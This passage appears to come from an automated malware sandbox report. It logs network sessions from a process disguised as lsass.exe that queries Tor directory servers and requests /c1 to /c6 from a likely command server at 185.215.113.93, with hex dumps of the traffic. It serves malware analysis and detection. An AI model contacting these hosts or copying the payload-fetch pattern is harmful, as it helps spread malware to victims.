            Jan 10, 2024 15:39:15.429548025 CET1286INData Raw: 1b 99 ff 91 46 5c 24 59 fb 6f 32 67 f1 bf 93 fe 04 a4 bf d2 d5 ed e3 21 7a b2 d0 a7 82 31 96 e6 e9 a9 f5 98 1c 27 38 dc 5f d3 6c e1 38 c4 ef 9e 1d 1b 69 c9 26 22 58 ed 66 93 cd f5 a1 f1 e9 f1 9d a1 89 90 57 42 14 84 86 58 1e 7c bc 1f 4b a7 e0 6e
            Data Ascii: F\$Yo2g!z1'8_l8i&"XfWBX|KnnP%|bG`(u|pLZlg01x6\R?jZjUZjEC@J!#J$CuB(X *Dx#k"%]KdDxFP*T&u]UEQ
            Jan 10, 2024 15:39:15.429630041 CET1286INData Raw: ed 27 f3 8d 96 2f 4e 8b 49 1c da ea 18 7a 4e 7f 1c 27 dd 9d 77 df 0c aa b8 13 e7 a8 2c b4 49 a2 29 b3 31 5d 1a 4c e1 5a 69 c9 0f 0e bb b5 b6 3d 96 7d 8b 5e e8 0d 9c d6 bd 49 b8 e3 b3 38 b8 6c cf b9 e8 3c a8 1f f7 ff 41 59 99 2c 39 8a 2c 6b 78 cf
            Data Ascii: '/NIzN'w,I)1]LZi=}^I8l<AY,9,kxSUd2OifQ `<[i[#?JlTABi3lqrhezJ<mr=!PtqrSo]>k;xtA..2$!@;HGi V>rZ
            Jan 10, 2024 15:39:15.536860943 CET1286INData Raw: 89 e4 18 0c ec e0 42 87 45 eb c6 f0 85 89 3c 5d b8 19 1c e5 7e 8f 3d 75 d4 a9 43 28 de 7c 24 e1 e2 4a 3a 42 f3 e5 8f b1 f6 55 e9 c6 95 05 cf 16 a7 2a 3c 78 14 ef df 15 a1 29 fb 03 5b ef 39 f6 d0 0f 19 c3 ed 30 1a db 9d e0 83 a9 b8 1d 24 3e f7 56
            Data Ascii: BE<]~=uC(|$J:BU*<x)[90$>V:G;%A:yY&q8u/ xrL3[Jad+U]|a~[]B+e!Jczv~AwCD&~UKvj}]0'$0n


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.64973986.59.21.38804596C:\180771693628709\lsass.exe
            TimestampBytes transferredDirectionData
            Jan 10, 2024 15:39:35.354928017 CET139OUTGET /tor/status-vote/current/consensus.z HTTP/1.1
            Accept-Encoding: gzip
            Host: 86.59.21.38
            Connection: Close
            Cache-Control: no-cache
            Jan 10, 2024 15:39:38.619224072 CET85INHTTP/1.0 503 Directory busy, try again later
            Date: Wed, 10 Jan 2024 14:39:35 GMT


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.649746193.11.164.24390304596C:\180771693628709\lsass.exe
            TimestampBytes transferredDirectionData
            Jan 10, 2024 15:40:27.212155104 CET147OUTGET /tor/status-vote/current/consensus.z HTTP/1.1
            Accept-Encoding: gzip
            Host: 193.11.164.243:9030
            Connection: Close
            Cache-Control: no-cache
            Jan 10, 2024 15:40:27.422684908 CET1286INHTTP/1.0 200 OK
            Date: Wed, 10 Jan 2024 14:40:27 GMT
            Content-Type: text/plain
            X-Your-Address-Is: 102.165.48.42
            Content-Encoding: deflate
            Expires: Wed, 10 Jan 2024 15:00:00 GMT
            Vary: X-Or-Diff-From-Consensus
            Data Raw: 78 da ec fd 69 73 a3 c8 b6 05 0c 7f 3f bf 82 ef ea b2 48 48 26 c5 73 9e 78 98 34 cf 68 7e e3 44 07 33 08 04 88 41 08 fd fa 37 13 bb aa 6c 6c 75 57 77 9f be d7 a5 db 15 65 59 b6 06 8b 4d b2 73 0f 6b af 15 d9 79 19 a7 c1 97 2c d7 f3 22 fb 72 b1 d3 cc 8f 23 82 fe d7 25 ce ed 97 df 12 66 1c 65 76 94 15 d9 bf be dd fb 72 b2 73 2f b6 08 1a 3d 53 0f 7d eb 8b ee e4 76 4a 50 24 05 bf 90 e0 0b 20 09 00 3b 24 89 fe ff cb 49 ed cc fb 52 44 b9 1f be 79 9c 79 79 fc f9 f5 ef 1f e7 be 3e 1e e7 7e e4 7e b1 ec 50 af 08 9a 24 f1 d7 bf cc d0 b7 a3 fc eb e7 cd 08 f2 09 3e 71 4f dc 2f cf df f9 97 ef 80 fc 7a 07 7c bd 43 7d bd 43 7f bd 03 bf de 61 be de 61 eb 3b fc 13 f8 a2 87 89 a7 bf fc 44 bd f9 89 fe 92 9a 2f 77 e1 cb 77 e6 e5 fb d7 97 73 2f df f9 97 ef c2 d7 b7 25 ff 95 d9 29 fa e8 3f ed c7 0f a2 b8 8c be 38 a1 ee 66 84 58 a0 85 90 fa 79 45 48 ba a5 5e fd 9c a8 6f ba 7a 96 13 bd 42 4f 2d a2 af 29 7e 4a 4c 7c cb 0a ed 59 14 56 c4 34 56 2d f9 eb 4a 22 96 45 14 a1 13 4c 68 b9 6e 84 36 fe 16 da 8a 9d 99 84 56 19 68 49 6c 28 fc ea 0d 5e 24 ff 4a 6d 33 3e 9d ec c8 b2 ad 2f 2f 2b 20 49 e3 3c 36 e3 30 23 f0 3b fe 9b 22 f0 4b f1 37 3f 95 75 d3 b3 d1 dd fa ef d7 df 07 51 9e c6 ff 86 e8 de 12 bd 09 fa d5 d8 8f 82 7f c3 2f 0c fa 74 66 1a 5b cf 2f 5d e2 95 f6 6f ea cd 5f 4b f1 ef fe 5b 7f 0c df c1 66 fb 37 7d e7 ef 9e 0b 3f fd fd 43 7c 7e bf df 7e 8b ff c9 cf 9d e8 a9 7e 7a 5e 10 e8 bd 26 fa 55 ab 57 79 36 b7 53 d1 b2 d2 7f f3 84 ec a7 66 e1 e7 f3 d4 af 57 4c 5f 0f 9d d0 77 ec 49 66 9b ff 46 57 35 ba b6 95 58 7b 79 92 9c da 7a 8e 2e 0e a9 48 b3 fc df ec 47 0f a9 11 5e 31 d6 bf c1 07 8f 4d fc 08 1d 6b 64 9b f8 87 fa 90 df 3d 65 a9 e7 f6 cb 03 df 9e f9 f6 2d bf fd 1a 1d 0c fa c1 2c d2 14 9d 10 39 46 ce ea df 4c fd 89 96 b6 53 64 b6 86 d6 6f 68 f7 e3 44 ae cf 18 b6 9b 7d bb c4 45 86 de 47 bd e6 e8 47 a9 52 2d 8a 61 80 30 50 d0 ef 46 03 6d a5 21 bb 5b 68 ed 23 73 23 33 e9 21 32 ea b4 38 4d 57 71 6d b0 95 38 ff 37 40 f6 58 67 f6 2c c9 fd 93 9f e5 be a9 e8 b9 8e 5e 6d 94 3a 32 71 e2 5b f5 fd cc d4 d1 a7 4c 7f 35 4d f4 a3 69 e4 b9 9d e5 c8 e5 9e d1 cb 09 d3 fc 55 0f 5d 74 8c e8 8e 59 46 d6 af 4e 11 86 bf ba 7a 82 4e ef 9b 5f 9d fc 28 31 f3 7f 53 cc b7 5f fb 51 fd 7e df 7f fa 35 c5 e6 a2 bf ff 0e bd e6 df 80 aa df 28 43 1f 22 f9 d5 46 d7 3d 3a 51 e4 f7 df c4 11 b2 dd bf 21 57 bf ed c5 76 f5 ec d7 da 09 3d 3f 15 f0 ec f7 df 1b 76 ae bf 3c 9f e6 a8 ef bf 47 6e 3f 7f 79 3e fd 7c 44 af 7f ff f2 07 68 f8 fd 01 57 3f 9d be 3e 40 41 9e 30 9d eb af 61 5c d6 6f f1 6b ee e1 cd 28 0e 2d 74 fa f0 07 45 0b e2 d7 93 7e fd d5 b4 91 11 ce 85 5d d8 bf 66 fe cd 46 c7 c5 dc 7f f4 d7 b8 c8 f1 c9 21 09 2b ce 7e 8d 8a d3 af df 9e 89 1e 39 ff 9b 21 5c ec f7 be 44 e8 ba f3 4f 7a 5a 7d b1 fc f4 4b fd bb ec 4b 1e 7f 41 0b 06 9d 92 e6 73 9a 8f 7b d9 af 78 97 f0 4d bb 7e e7 d4 ba fc ea e8 7e 58 a0 03 40 27 c6 cb d0 7b fe 9a 25 68 29 5b bf 66 79 9c da e8 94 c6 e8 6a 0b 63 f4 8b fa e8 b3 c0 8f 7e 8d d0 43 bf 26 36 ba e0 d0 d3 6c 13 bd 94 e4 d1 07 bf f7 4c 74 d6 42 1b 3f df b4 eb 25 4e 12 c8 49 5b 27 fb 57 fb 84 ac 87 ce f8 af 2f 5b d6 bf c1 bf 32 4f af 3d 8c 1e 59 e8 20 ec 8b 1f e3 00 42 0f 0b 9b e0 88 bc 9d 70 b9 7d 1c f6 38 6b 61 fa 07 f2 b0 1f 2d 4b 36 5f 8e af 5d c9 4f 1c 8b a1 b8 64 99 d0 92 7e 0d fe fd e6 9d 5e ae b1
            Data Ascii: xis?HH&sx4h~D3A7lluWweYMsky,"r#%fevrs/=S}vJP$ ;$IRDyyy>~~P$>qO/z|C}Caa;D/wws/%)?8fXyEH^ozBO-)~JL|YV4V-J"ELhn6VhIl(^$Jm3>//+ I<60#;"K7?uQ/tf[/]o_K[f7}?C|~~~z^&UWy6SfWL_wIfFW5X{yz.HG^1Mkd=e-,9FLSdohD}EGGR-a0PFm![h#s#3!28MWqm87@Xg,^m:2q[L5MiU]tYFNzN_(1S_Q~5(C"F=:Q!Wv=?v<Gn?y>|DhW?>@A0a\ok(-tE~]fF!+~9!\DOzZ}KKAs{xM~~X@'{%h)[fyjc~C&6lLtB?%NI['W/[2O=Y Bp}8ka-K6_]Od~^


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.649747185.215.113.93804596C:\180771693628709\lsass.exe
            TimestampBytes transferredDirectionData
            Jan 10, 2024 15:40:34.265763998 CET170OUTGET /c1 HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
            Host: 185.215.113.93
            Jan 10, 2024 15:40:34.508837938 CET728INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Wed, 10 Jan 2024 14:40:34 GMT
            Content-Type: text/html
            Content-Length: 564
            Connection: keep-alive
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.649748185.215.113.93804596C:\180771693628709\lsass.exe
            TimestampBytes transferredDirectionData
            Jan 10, 2024 15:40:35.766335964 CET170OUTGET /c2 HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
            Host: 185.215.113.93
            Jan 10, 2024 15:40:36.009268999 CET728INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Wed, 10 Jan 2024 14:40:35 GMT
            Content-Type: text/html
            Content-Length: 564
            Connection: keep-alive
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            7192.168.2.649749185.215.113.93804596C:\180771693628709\lsass.exe
            TimestampBytes transferredDirectionData
            Jan 10, 2024 15:40:37.262275934 CET170OUTGET /c3 HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
            Host: 185.215.113.93
            Jan 10, 2024 15:40:37.505966902 CET728INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Wed, 10 Jan 2024 14:40:37 GMT
            Content-Type: text/html
            Content-Length: 564
            Connection: keep-alive
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            8192.168.2.649750185.215.113.93804596C:\180771693628709\lsass.exe
            TimestampBytes transferredDirectionData
            Jan 10, 2024 15:40:38.761794090 CET170OUTGET /c4 HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
            Host: 185.215.113.93
            Jan 10, 2024 15:40:39.004462004 CET728INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Wed, 10 Jan 2024 14:40:38 GMT
            Content-Type: text/html
            Content-Length: 564
            Connection: keep-alive
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            9192.168.2.649751185.215.113.93804596C:\180771693628709\lsass.exe
            TimestampBytes transferredDirectionData
            Jan 10, 2024 15:40:40.262161970 CET170OUTGET /c5 HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
            Host: 185.215.113.93
            Jan 10, 2024 15:40:40.505892038 CET728INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Wed, 10 Jan 2024 14:40:40 GMT
            Content-Type: text/html
            Content-Length: 564
            Connection: keep-alive
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            10192.168.2.649752185.215.113.93804596C:\180771693628709\lsass.exe
            TimestampBytes transferredDirectionData
            Jan 10, 2024 15:40:41.772838116 CET170OUTGET /c6 HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
            Host: 185.215.113.93
            Jan 10, 2024 15:40:42.014041901 CET728INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Wed, 10 Jan 2024 14:40:41 GMT
            Content-Type: text/html
            Content-Length: 564
            Connection: keep-alive
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 